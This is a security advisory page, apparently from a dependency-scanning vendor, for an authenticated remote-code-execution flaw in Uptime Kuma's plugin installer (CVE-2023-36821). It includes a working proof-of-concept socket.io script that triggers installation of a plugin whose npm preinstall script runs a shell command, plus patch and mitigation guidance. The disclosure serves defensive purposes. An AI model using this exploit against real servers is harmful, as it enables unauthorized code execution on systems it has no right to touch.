Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
📦 npm

GHSA-7grx-f945-mj96

HIGH

Uptime Kuma vulnerable to authenticated remote code execution via malicious plugin installation

Also known asCVE-2023-36821
Published
May 1, 2024
Updated
May 1, 2024
Affected
1 pkg
Patched
1 / 1
Exploits
1 known

EPSS Exploitation Probability

via FIRST.org ↗
1.7%probability of exploitation in next 30 days
Lower Risk74th percentile-0.82%
1.16%2.04%2.93%3.81%2.5%1.7%Dec 25Apr 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

uptime-kumanpm
53downloads / week

Description

Summary

Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.

Details

Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login. After downloading a plugin, it's installed by calling npm install in the installation directory of the plugin: https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216

Because the plugin is not validated against the official list of plugins or installed with npm install --ignore-scripts, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution.

PoC

In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty index.js and a package.json containing the script: "preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc". This will be executed when installing the plugin.

  1. Start Uptime Kuma: docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1
  2. Create a user using the Uptime Kuma web interface, e.g. user admin with password admin123
  3. Confirm that the PoC file to be created doesn't exist yet:
➜  ~ docker exec -it uptime-kuma cat /tmp/poc
cat: /tmp/poc: No such file or directory
  1. Create file poc.js with the following content:
SERVER = "ws://localhost:3001";
USERNAME = "admin";
PASSWORD = "admin123";


const { io } = require("socket.io-client");
const socket = io(SERVER);
const repo = "https://github.com/n-thumann/npm-install-script-poc";
const name = "npm-install-script-poc";

socket.emit(
  "login",
  { username: USERNAME, password: PASSWORD, token: "" },
  (res) => {
    if (res.ok !== true) return console.log("Login failed");

    console.log("Login successful");
    socket.emit("installPlugin", repo, name, () => {
      console.log("Done");
      socket.close();
    });
  }
);
  1. Install socket.io-client: npm install socket.io-client
  2. Run the script: node poc.js:
# node poc.js
Login successful
Done
  1. The PoC file has been created:
➜  ~ docker exec -it uptime-kuma cat /tmp/poc
Malicious code could have been executed as user root

Impact

This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npmuptime-kumaall versions1.22.1
Exploits & PoCs
1

Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.

Uptime Kuma, a self-hosted monitoring tool, allows an authenticated atta…

github.comNVDJul 2023

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for uptime-kuma. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update uptime-kuma to 1.22.1 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7grx-f945-mj96 is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-7grx-f945-mj96 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-7grx-f945-mj96. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker. ### Details Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login. After downloading a plugin, it's installed by calling `npm install` in the installation directory of the plugin: https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216 Because the p
O3 Security · Impact-Aware SCA

Is GHSA-7grx-f945-mj96 in your dependencies?

O3 detects GHSA-7grx-f945-mj96 across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works